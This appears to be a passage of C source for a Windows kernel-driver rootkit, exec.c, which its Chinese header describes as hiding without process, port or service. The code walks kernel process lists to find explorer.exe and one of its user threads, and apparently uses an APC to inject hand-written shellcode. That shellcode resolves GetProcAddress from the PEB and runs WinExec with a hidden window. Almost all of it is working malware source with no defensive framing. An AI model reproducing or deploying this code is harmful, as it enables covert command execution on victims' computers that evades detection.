exec.c

一个驱动上实现 无进程 无端口 无服务的简单rootkit

	u_DbgPrint(("NormAlContext: 0x%x\n",(ULONG)*NormAlContext));
	pEvent	= (PKEVENT)*SystemArgument1;
	KeSetEvent(pEvent,IO_NO_INCREMENT,FALSE);
	//CmdLine	= (PWGETPARA)*NormAlContext;
	//*SystemArgument1	= (PVOID)pPArA->szFileNAme;
	//*SystemArgument2	= (PVOID)pPArA->ulType;
	//*NormAlContext		= (PVOID)pPArA->szURL;
	//u_DbgPrint(("SystemArgument1: 0x%x\n",(ULONG)*SystemArgument1));
	//u_DbgPrint(("SystemArgument2: 0x%x\n",(ULONG)*SystemArgument2));
	//ExFreePool(pPArA);///free the pool AllocAted in KernelMessAgeBox

	//u_DbgPrint(("Freeing APC Object\n"));
	ExFreePool(Apc);    // free the kernel memory
}
//--------------------------------------------------------------------
BOOLEAN
find_threAd_Exec(
	OUT	ULONG	*process,
	OUT	ULONG	*threAd
	)
{
	ULONG			eproc;
	ULONG			begin_proc;
	ULONG			ethreAd;
	ULONG			begin_threAd;

	PLIST_ENTRY		plist_Active_procs;
	PLIST_ENTRY		plist_threAd;

/*
#define IS_SYSTEM_THREAD(thread)                                    \
            (((thread)->Tcb.Teb == NULL) ||                         \
            (IS_SYSTEM_ADDRESS((thread)->Tcb.Teb)))
			*/

	eproc		= (ULONG)PsGetCurrentProcess();
	begin_proc	= eproc;
	while(1){
		u_DbgPrint(("%s\n",(CHAR*)(eproc + IMAGEFILENAME_OFFSET)));
		if (0 == _stricmp((CHAR*)(eproc + IMAGEFILENAME_OFFSET),"explorer.exe")){
			break;
		}
		else{
			plist_Active_procs = (LIST_ENTRY*)(eproc + ACTIVEPROCESSLINKS_OFFSET);
			eproc = (ULONG) plist_Active_procs->Flink;
			eproc = eproc - ACTIVEPROCESSLINKS_OFFSET;
			if(eproc == begin_proc) return FALSE;
		}
	}
	plist_threAd	= (LIST_ENTRY*)(eproc + THREADLISTHEAD_OFFSET);
	ethreAd			= (ULONG)plist_threAd->Flink;
	ethreAd			= ethreAd - THREADLISTENTRY_OFFSET;
	u_DbgPrint(("threAd: 0x%x\n",ethreAd));

	begin_threAd	= ethreAd;
	while(1){
		//if !IS_SYSTEM_THREAD(threAd)
		

		u_DbgPrint(("(*(ULONG*)((ULONG)ethreAd+TCB_TEB_OFFSET): 0x%x\n",*(ULONG*)((CHAR*)ethreAd+TCB_TEB_OFFSET)));
		if( (*(ULONG*)((ULONG)ethreAd+TCB_TEB_OFFSET) != 0)	&&
            (*(ULONG*)((ULONG)ethreAd+TCB_TEB_OFFSET) <= 0x80000000 )
			){
			break;
		}
		else{
			plist_threAd = (LIST_ENTRY*)(ethreAd + THREADLISTENTRY_OFFSET);
			ethreAd	= (ULONG)plist_threAd->Flink;
			ethreAd = ethreAd - THREADLISTENTRY_OFFSET;
			u_DbgPrint(("ethreAd: 0x%x\n",ethreAd));
			if(ethreAd == begin_threAd) return FALSE;
		}
	}
	*process	= eproc;
	*threAd		= ethreAd;
	return TRUE;
}
//--------------------------------------------------------------------
__declspec(naked)
UserExec(
	PCHAR	CmdLine,
	PVOID	unused1,
	PVOID	unused2
	)
{
	__asm{
		push	ebp
		mov		ebp, esp
	}
	__asm{
		pushad
		sub		esp, 20 //存放得到的函数地址
		jmp		end
            
start:
        pop		edx                    // 指令表起始地址存放在  esp -> edx

		push	ebp//u 保存 下面这段程序用到了ebp

        // ===== 从 PEB 中取得KERNEL32.DLL的起始地址 =====
        //
        // 输入:
        // edx => 指令表起始地址 (不需要)
        //
        // 输出:
        // eax => kernel32.dll起始地址
        // edx => 指令表起始地址

        mov		eax, fs:0x30            // PEB 
        mov		eax, [eax + 0x0c]       // PROCESS_MODULE_INFO
        mov		esi, [eax + 0x1c]		// InInitOrder.flink
        lodsd
        mov		eax, [eax+8]

        // ========== 定位GetProcAddress的地址 ==========
        //
        // 输入:
        // eax => kernel32.dll起始地址
        // edx => 指令表起始地址
        //
        // 输出:
        // ebx => kernel32.dll起始地址
        // eax => GetProcAddress地址
        // edx => 指令表起始地址

        mov		ebx, eax							// 取kernel32.dll的起始地址
        mov		esi, dword ptr [ebx+0x3C]			//u 在e_lfanew中得到pe heAder
        mov		esi, dword ptr [esi+ebx+0x78]		//u export directory rvA
        add     esi, ebx					
        mov		edi, dword ptr [esi+0x20]			//u struct _IMAGE_EXPORT_DIRECTORY 中AddressOfNames; // RVA from base of image
        add		edi, ebx
        mov		ecx, dword ptr [esi+0x14]			//u AddressOfFunctions; // RVA from base of image
        xor		ebp, ebp
        push    esi
        
search_GetProcAddress:
        push    edi
		push    ecx
		mov		edi,dword ptr [edi]
		add		edi,ebx								// 把输出函数名表起始地址存人edi
		mov		esi,edx								// 指令表起始地址存入esi
		//mov    ecx,0Eh							// 函数getprocAddress长度为0Eh
		push    0xE
		pop		ecx
		repe    cmps byte ptr [esi],byte ptr [edi]
        je		search_GetProcAddress_ok
        
        pop		ecx
        pop		edi
        add		edi,4  ///
        inc		ebp
        loop	search_GetProcAddress

search_GetProcAddress_ok:
        pop		ecx   
        pop		edi
        pop		esi
        mov		ecx, ebp
        mov		eax, dword ptr [esi+24h]			//u AddressOfNameOrdinals; // RVA from base of image
        add		eax, ebx
        shl		ecx, 1
        add		eax, ecx
        xor		ecx, ecx
        mov		cx,  word ptr [eax]
        mov		eax, dword ptr [esi+1Ch]			//AddressOfFunctions; // RVA from base of image
        add		eax, ebx
        shl		ecx, 2
        add		eax, ecx
        mov		eax, dword ptr [eax]
        add		eax, ebx
		

		pop		ebp//u 保存
//--------------------------------------------------------------------

		// ============ 调用函数解决api地址 ============
        //
        // 输入:
        // ebx =>kernel32.dll起始地址
        // eax =>GetProcAddress地址
        // edx =>指令表起始地址
        //
        // 输出:
        // edi =>函数地址base addr
        // esi =>指令表当前位置
        // edx =>GetProcAddress 地址

        mov		edi,edx
        mov		esi,edi
        add		esi,0xE						// 0xE 跳过1个字符串"GetProcAddress"
        
        // ============ 解决kernel32.dll中的函数地址 ============
        mov		edx,eax						// 把GetProcAddress 地址存放在edx    
        push    0x1							// 需要解决的函数地址的个数 硬编码可以节省两个字节
        pop		ecx
		mov		edi, esp					///////// get some spAce to edi
        call    locator_api_addr	
		

		push	0			//SW_HIDE
		push	CmdLine
		call	dword ptr [edi-4]
		jmp		end_func

//--------------------------------------------------------------------
		// ============ 解决api地址的函数 ============
        //
        // 输入参数:
        // ecx 函数个数
        // edx GetProcAddress 地址
        // ebx 输出函数的dll起始地址
        // esi 函数名表起始地址
        // edi 保存函数地址的起始地址

locator_api_addr:
        
locator_space:
        xor			eax, eax
        lodsb
        test		eax, eax                // 寻找函数名之间的空格x00
        jne			locator_space

        push		ecx
        push		edx

        push		esi                    // 函数名
        push		ebx                    // 输出函数的dll起始地址
        call		edx
        pop			edx
        pop			ecx
        stos		dword ptr [edi]
        loop		locator_space
        xor			eax, eax
        ret
//--------------------------------------------------------------------

        // ==================  结束调用 ====================
end:
        call    start
		__emit 'G'
		__emit 'e'
		__emit 't'
		__emit 'P'
		__emit 'r'
		__emit 'o'
		__emit 'c'
		__emit 'A'
		__emit 'd'
		__emit 'd'
		__emit 'r'
		__emit 'e'
		__emit 's'
		__emit 's'
		__emit 0
		__emit 'W'
		__emit 'i'
		__emit 'n'
		__emit 'E'
		__emit 'x'
		__emit 'e'
		__emit 'c'
		__emit 0

end_func:
		add esp,20
		popad
	}
	__asm{
		mov esp,ebp
		pop ebp
		ret			//don't forget this :>
	}
}
//--------------------------------------------------------------------
__declspec(naked) UserExec_end(VOID)
{
	__asm{
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0
		__emit 0 //100
	}


}
//--------------------------------------------------------------------